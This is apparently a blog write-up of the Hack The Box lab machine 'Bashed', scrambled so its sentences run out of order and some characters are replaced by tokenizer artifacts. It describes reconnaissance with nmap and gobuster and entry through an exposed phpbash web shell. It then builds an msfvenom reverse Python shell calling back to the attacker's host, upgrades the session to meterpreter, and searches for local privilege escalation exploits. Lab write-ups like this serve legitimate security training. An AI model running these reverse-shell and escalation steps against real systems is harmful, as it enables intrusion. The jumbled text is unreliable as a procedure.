I try to exploit all of them but nothing worked, so I move on to the dirty cow. = # Name Disclosure Date Rank Check DescriptionĠ exploit/aix/local/xorg_x11_server great Yes Xorg X11 Server Local Privilege Escalationġ exploit/multi/local/xorg_x11_suid_server good Yes Xorg X11 Server SUID logfile Privilege EscalationĢ exploit/multi/local/xorg_x11_suid_server_modulepath good Yes Xorg X11 Server SUID modulepath Privilege Escalation I search for each CVE in msfconsole and find a potential candidate: msf6 exploit (multi/handler ) > search 14665 I then drop into a usual shell with shell, make the script executable and run it chmod +x I download it on my local machine and upload it to the server thanks to my meterpreter shell: meterpreter > upload Challenges/htb/bashed/ /tmp To automatically get some exploit suggestions I use linux-exploit-suggester. The first thing to try is look for existing public privilege escalation exploits. I used some scripts, then the payload reverse_bash but this way worked best for me. I didn't manage to make it work on the first try. Now I can select my new fancy meterpreter shell with sessions 2. Started reverse TCP handler on 10.10.14.9:4433 msf6 exploit (multi/handler ) > sessions -u 1 Executing 'post/multi/manage/shell_to_meterpreter' on session (s ): Upgrading session ID: 1 Starting exploit/multi/handler Then sessions -u 1 to upgrade the session. To upgrade it to a meterpreter shell I use background to put the current session in the background. I now have a nicer shell, but still not nice enough. Started reverse TCP handler on 10.10.14.9:4446 I copy the code and paste it into the web shell and execute it.msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.9 LPORT=4446 -f raw > payload.py creates the payload.I start listening for incoming connections with exploit.I configure the listening host with my IP and set the listening port to 4446 set LPORT 4446.I choose the payload 'reverse_python': set payload cmd/unix/reverse_python.Then I select the exploit 'multi/handler' use exploit/multi/handler.The first step is to start listening for incoming connections: I now need to get root, but first, lets get a fancy shell. I also notice that there is another user named scriptmanager. This immediately gives me the user flag located in /home/arrexel/user.txt. The directory /dev leads to an instance of phpbash: I now have a working shell. I use gobuster to enumerate possible directories used: gobuster dir -u -w Resources/SecLists/Discovery/Web-Content/ I start nmap scripts on the open port to gather more information: nmap -p80 -A -Pn bashedĨ0/tcp open http Apache httpd 2.4.18 ((Ubuntu )) |_http-server-header: Apache/2.4.18 (Ubuntu ) |_http-title: Arrexel's Development Site Information gathered Operating System The web page is just a simple blog that promotes phpbash, a standalone, semi-interactive web shell. Then I look for open ports with nmap and start an OpenVAS scan: nmap -p- bashed -Pn
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |